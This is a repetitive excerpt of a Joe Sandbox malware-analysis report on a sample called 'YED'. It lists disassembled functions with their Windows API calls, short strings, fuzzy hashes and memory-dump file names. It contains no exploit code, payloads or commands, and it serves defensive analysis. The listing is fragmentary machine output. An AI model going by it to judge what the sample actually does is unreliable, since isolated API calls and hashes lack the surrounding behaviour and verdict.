Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: db7da109d7d4073431fd3f56c9c6c765040940980c894459acec21da27cdddb2
Instruction ID: e0469c0acad6397cbd98ac743fbf0bf852d2c446e38640c296484e932ac6b361
Opcode Fuzzy Hash: db7da109d7d4073431fd3f56c9c6c765040940980c894459acec21da27cdddb2
Instruction Fuzzy Hash: 70E06D71611224BBD7205F63AC0DEEB3E6CEB83FA1F104015F109D10809AA08844C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00229639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296A2
Part of subcall function 00229639: BeginPath.GDI32(?), ref: 002296B9
Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002A8887
LineTo.GDI32(?,?,?), ref: 002A8894
EndPath.GDI32(?), ref: 002A88A4
StrokePath.GDI32(?), ref: 002A88B2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9ff9dc3af0a0451be90c3fc35ee1900a17c76122d06aa5793bbf5f8e52af2286
Instruction ID: 0ca67af6e67df3d4525cbe64481d454bc40dc61bf5f3dcc853598acf05656f56
Opcode Fuzzy Hash: 9ff9dc3af0a0451be90c3fc35ee1900a17c76122d06aa5793bbf5f8e52af2286
Instruction Fuzzy Hash: 2EF03A36055299BBDB125F94BC0DFCE3A59AF06310F548000FA11650E2CF795561CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 002298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 002298CC
SetTextColor.GDI32(?,?), ref: 002298D6
SetBkMode.GDI32(?,00000001), ref: 002298E9
GetStockObject.GDI32(00000005), ref: 002298F1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: a41f488b54878628067af8e209a1d74fd6bc14605d1cd73bea3a9e1c29525f72
Instruction ID: 29392e2ffa6e30d6fd419b284e4e668d3e40446c834ca1df97475f3033ee5ae5
Opcode Fuzzy Hash: a41f488b54878628067af8e209a1d74fd6bc14605d1cd73bea3a9e1c29525f72
Instruction Fuzzy Hash: C0E06D31244280ABDB215F74BC0DBE83F60EB13336F248219F6FA581E1CB7246949B10

Uniqueness

Uniqueness Score: -1.00%

Function 0027162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00271089,?,?,?,002711D9), ref: 00271634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002711D9), ref: 0027163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002711D9), ref: 00271648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002711D9), ref: 0027164F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a06dcd641581b9d5678093020d52b9b46879f30bb5c2dc13f193401b28dba1a3
Instruction ID: a3f47065ecc10556b1d8b1ebbbf243ee6a27c4a0420533b336d9271dc871fbc4
Opcode Fuzzy Hash: a06dcd641581b9d5678093020d52b9b46879f30bb5c2dc13f193401b28dba1a3
Instruction Fuzzy Hash: 85E08631601221DBD7201FA4BD0DB473B7CAF46791F248848F745C9080DE344550C750

Uniqueness

Uniqueness Score: -1.00%

Function 0026D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0026D858
GetDC.USER32(00000000), ref: 0026D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0026D882
ReleaseDC.USER32(?), ref: 0026D8A3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d2568f800c817743f2c49863fa790cb1e53d77a3160b920179b858817506811a
Instruction ID: 9a4ad128913ea096098d1a23f71dbe83bec56bb42e5e5ef5b8053bacadd2a8c0
Opcode Fuzzy Hash: d2568f800c817743f2c49863fa790cb1e53d77a3160b920179b858817506811a
Instruction Fuzzy Hash: DEE01AB4810204EFCB419FA0E80C66DBBF5FB49710F208049E816E7360CB788952AF40

Uniqueness

Uniqueness Score: -1.00%

Function 0026D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0026D86C
GetDC.USER32(00000000), ref: 0026D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0026D882
ReleaseDC.USER32(?), ref: 0026D8A3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b7bffb8014a5001b017f421375d96555c00b170823e83da1b4be381922457499
Instruction ID: c1bb98e2b451ce756b70a050111000364f7dfba54ba894d34888b975f30f35f5
Opcode Fuzzy Hash: b7bffb8014a5001b017f421375d96555c00b170823e83da1b4be381922457499
Instruction Fuzzy Hash: 82E01A74810204EFCB419FA0E80C66DBBF5BB48710B208049E916E7360CB3899119F40

Uniqueness

Uniqueness Score: -1.00%

Function 02A30601 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

ZL, xrefs: 02A30792
, xrefs: 02A3065A

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID:
String ID: $ZL
API String ID: 0-3552672294
Opcode ID: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
Instruction ID: 2acf8e04cd07f2dc7f640216b09b89c1114f87f9ccff9e2963db8eac741ef1ef
Opcode Fuzzy Hash: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
Instruction Fuzzy Hash: 2D81BC71900209AFDF229FA4CD89FEE7BB9EF04708F14403AF914A21A0DB718944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00284D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00284ED4

Strings

*, xrefs: 00284E10
LPT, xrefs: 00284DFB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: eb06bfc2452f63b63e8bfbe8a7977748846b4023fdcc62977f3fdcff45e0f012
Instruction ID: 115cbfbd91a2dc3774f32ad1eea7dc25c5652b9176d981bdf36bd5ef2e69de49
Opcode Fuzzy Hash: eb06bfc2452f63b63e8bfbe8a7977748846b4023fdcc62977f3fdcff45e0f012
Instruction Fuzzy Hash: 12917179A112069FCB14EF54C484EA9BBF1BF58304F14809DE90A5F7A2C771ED95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0023E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0023E30D

Strings

pow, xrefs: 0023E2E5, 0023E302

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0bfcab42c868d04d89ce8eaff850452e4a82930aa0c116f7fb6aec99e8752c0
Instruction ID: 1a89ae4386f1f12b5f9c97c964d39cb9d408c8fa48fb2aed909ce2929dfdb984
Opcode Fuzzy Hash: c0bfcab42c868d04d89ce8eaff850452e4a82930aa0c116f7fb6aec99e8752c0
Instruction Fuzzy Hash: 33514DA1E3C203D6CF197F24D9453BA3BA4EF40740F354A99E4B5422E9DB348CB99A46

Uniqueness

Uniqueness Score: -1.00%

Function 00297771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0026569E,00000000), ref: 002978DD

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

CharUpperBuffW.USER32(0026569E,00000000), ref: 0029783B

Strings

<s-, xrefs: 002977C8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s-
API String ID: 3544283678-2482877350
Opcode ID: 9433d1fa7676b39a07b57ec44bb49a74b693b79c40143dd54c707da78c703fea
Instruction ID: 13b679b5ceff4d30093409969121c356a92fc524aca00d95ea87dc1f22c39d1c
Opcode Fuzzy Hash: 9433d1fa7676b39a07b57ec44bb49a74b693b79c40143dd54c707da78c703fea
Instruction Fuzzy Hash: 6E614C72934119AACF04EFE4CC95DFDB3B8FF24700B544126E542A7191EF70AAA5DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0022E1B1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 318336bfacb49c9122bce901c70db5181374641478d0158f94c9768680cf3417
Instruction ID: a7b9dc70bc3c7eefad5e783c49af0ea6cbb24ba07e0eb4a2a5d9e837508ef0b8
Opcode Fuzzy Hash: 318336bfacb49c9122bce901c70db5181374641478d0158f94c9768680cf3417
Instruction Fuzzy Hash: 55517838520203EFDF15DF68D041AFABBA8EF25310F254015EC929B2C0D6309DA2DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0022F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0022F2BB

Strings

@, xrefs: 0022F2AF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: fce487ff10e368480a6ba6c85e53d55e97f90960c64e97cb544d69c59a618c32
Instruction ID: 7b4a8fa14cf451162002f107dc870614437be7047fc9b8d967700ce3e4cb6792
Opcode Fuzzy Hash: fce487ff10e368480a6ba6c85e53d55e97f90960c64e97cb544d69c59a618c32
Instruction Fuzzy Hash: EF5134714187449BD320AF10E88ABAFBBF8FB95300F91885DF199421A5EB318579CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00295745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002957E0
_wcslen.LIBCMT ref: 002957EC

Strings

CALLARGARRAY, xrefs: 002957E6, 002957EB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 512393ed4142a8ab546c73610226c208bf7285f67acfa8be78dd83e487bd9e32
Instruction ID: 46d13a8614d1e4b70fec1be97051303b6dc93f0b4fcbd63d775a5173d55fa312
Opcode Fuzzy Hash: 512393ed4142a8ab546c73610226c208bf7285f67acfa8be78dd83e487bd9e32
Instruction Fuzzy Hash: 3741AE71A2021A9FCF15DFA8C8859EEBBF5FF59320F108069E505A7251EB709DA1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0028D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0028D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0028D13A

Strings

|, xrefs: 0028D10B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 7d48d1c3ee618d4ed50fe369dcebb51037bf7cbbbf243c0e235adbf59b621ec5
Instruction ID: 04888f2f5b196ccb783be25881505da79e6657b1ce60cf47f0888a93fa324b13
Opcode Fuzzy Hash: 7d48d1c3ee618d4ed50fe369dcebb51037bf7cbbbf243c0e235adbf59b621ec5
Instruction Fuzzy Hash: 63311B75D21109ABCF15EFA4CC89EEE7FB9FF14300F100119E819A61A5DB31A966DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 002A3621
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 002A365C

Strings

static, xrefs: 002A35BC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: af012bddeb747de0d5520dbe328774c80f555d478aae99747ee29fa8f51cbca8
Instruction ID: 9d65892481c90921ba6381abed4eaab83eb1627e6dbf20c54046d0b24ffeb790
Opcode Fuzzy Hash: af012bddeb747de0d5520dbe328774c80f555d478aae99747ee29fa8f51cbca8
Instruction Fuzzy Hash: C8318C71520205ABDB10DF68DC80EFB73ADFF89724F108619F8A597290DA31ADA19B64

Uniqueness

Uniqueness Score: -1.00%

Function 002A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 002A461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A4634

Strings

', xrefs: 002A458E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 316d84adafb31924a078e381f3059d900537ba4715654f42c8d31e46ccafa1b9
Instruction ID: eefaed8118d88fab61ea92c3efcf491a69c54d9fc3071c95109e59968292843d
Opcode Fuzzy Hash: 316d84adafb31924a078e381f3059d900537ba4715654f42c8d31e46ccafa1b9
Instruction Fuzzy Hash: 1E312874A1120A9FDB14DF69C980BDA7BB9FF9A700F50406AE904AB341DBB0E951CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002A327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A3287

Strings

Combobox, xrefs: 002A3249

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 545327e51a7e00eb876a9466c4238e3c384ec104cdbe4512a86093edf234af43
Instruction ID: 67fb3b6b60cf525607308e1efbaed461e440a90ed6e43ebca6844c865bc1871b
Opcode Fuzzy Hash: 545327e51a7e00eb876a9466c4238e3c384ec104cdbe4512a86093edf234af43
Instruction Fuzzy Hash: B411E6713202097FFF15DE54DC84FBB375AEB96364F100125F91897290DA319D618B60

Uniqueness

Uniqueness Score: -1.00%

Function 002A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0021600E: CreateWindowExW.USER32 ref: 0021604C
Part of subcall function 0021600E: GetStockObject.GDI32(00000011), ref: 00216060
Part of subcall function 0021600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A

GetWindowRect.USER32(00000000,?), ref: 002A377A
GetSysColor.USER32 ref: 002A3794

Strings

static, xrefs: 002A3757

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b17a1c4950ccc0fdd65ac2dd8f2dbea1d7e86a2270d75c0808e3ce9ff8ae0fe1
Instruction ID: a759fe289d60192f2e17b62ebc58c5160a04f470e99f4f80c4bced2c959aa19b
Opcode Fuzzy Hash: b17a1c4950ccc0fdd65ac2dd8f2dbea1d7e86a2270d75c0808e3ce9ff8ae0fe1
Instruction Fuzzy Hash: 07112CB262020AAFDB00DFA8DC45EFABBF8FB09354F104515F955E2250DB75E8619B50

Uniqueness

Uniqueness Score: -1.00%

